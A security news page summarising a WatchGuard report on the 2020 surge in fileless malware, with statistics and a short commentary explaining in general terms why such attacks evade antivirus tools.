News &
Information

Anti-virus Software: Ineffective Against Surging Zero-Day Malware

A malware report from the first quarter of 2021 shows how zero-day malware is a significant threat that many traditional security programs cannot detect. We examine.

Limited Access Is The Centerpiece Of All Data Security Strategies

Employers must revoke account access when employees leave. Read about how continued access creates exposure.

Why Is Trojan Malware So Effective?

The latest security report shows Trojan malware is a primary network security risk for users. Read about the dangers of this type of attack and how to avoid becoming a victim.

Back Up Often And Off-Line To Help Address Ransomware Risks

Ransomware attacks are increasingly common, and all organizations must prepare now for an attack. We examine.

Why Is Fileless Malware Surging?

According to network security vendor Watchguard Technologies' Internet Security Report, fileless malware detections increased 888 percent year-on-year in 2020.

Hackers turned to fileless malware to conduct attacks without installing malicious code so they can hide from traditional security controls.

Popular toolkits such as PowerSploit and CobaltStrike allow cybercriminals to inject malicious code into running processes, which means that the code remains operational even if the original script is identified and removed.

Hackers are also using encryption to hide their malicious activity. According to Watchguard, 47 percent of attacks detected at the network perimeter in the fourth quarter were encrypted.

In addition, malware delivered via HTTPS increased 41 percent and encrypted zero-day variants increased 22 percent over the third quarter.

Network attack detections increased five percent in the fourth quarter to the highest level in two years. Total unique attack signatures also increased four percent in the fourth quarter of 2020.

With the value of digital currency on the rise, 25 percent more cryptocurrency mining malware was detected in 2020 than in 2019.

However, ransomware declined for the second year in a row from an all-time high of 5489 unique payloads in 2018 to 2152 unique payloads in 2020. However, Watchguard stated that these variants likely infected hundreds of thousands of endpoints globally.

Watchguard Technologies used data from its Firebox Feed, internal and partner threat intelligence, and a research honeynet for the report. Phil Muncaster "Fileless Malware Detections Soar 900 Percent in 2020" infosecurity-magazine.com (Mar. 30, 2021).

Commentary

Fileless malware does not use executable files to spread malware like a traditional malware attack. Instead, it takes advantage of legitimate tools that are part of the operating system.

Fileless malware uses trusted processes, such as Microsoft Office Macros, PowerShell, WMI, to perform malicious activities including lateral movement, privilege escalation, evasion, reconnaissance, and payload delivery. Allie Mellen “Fileless Malware 101: Understanding Non-Malware Attacks” www.cybereason.com (Sep. 17, 2019).

Fileless malware creates more problems for employers by spreading easily and causing more damage through its ability to hide from antivirus protections. Detecting and preventing fileless malware is challenging because hackers hijack tools that they know are pre-installed on every Windows device and are part of the daily workflow.

Because there is no executable, there is no signature for antivirus software to detect. As far as virus protections are concerned, trusted tools are running as they should. As a result, fileless malware attacks are becoming more prevalent.

Finally, your opinion is important to us. Please complete the opinion survey: